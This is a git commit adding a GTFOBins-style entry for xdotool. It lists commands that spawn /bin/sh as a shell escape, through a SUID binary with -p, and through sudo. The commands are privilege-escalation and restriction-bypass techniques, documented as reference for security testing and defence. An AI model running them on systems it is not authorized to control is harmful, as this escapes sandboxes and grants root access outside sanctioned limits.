Add xdotool

This commit is contained in:
Miguel R 2022-07-01 09:07:41 +02:00 committed by GitHub
parent a3ed061355
commit 0df54898d8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/xdotool.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: xdotool exec --sync /bin/sh
suid:
- code: ./xdotool exec --sync /bin/sh -p
sudo:
- code: sudo xdotool exec --sync /bin/sh
---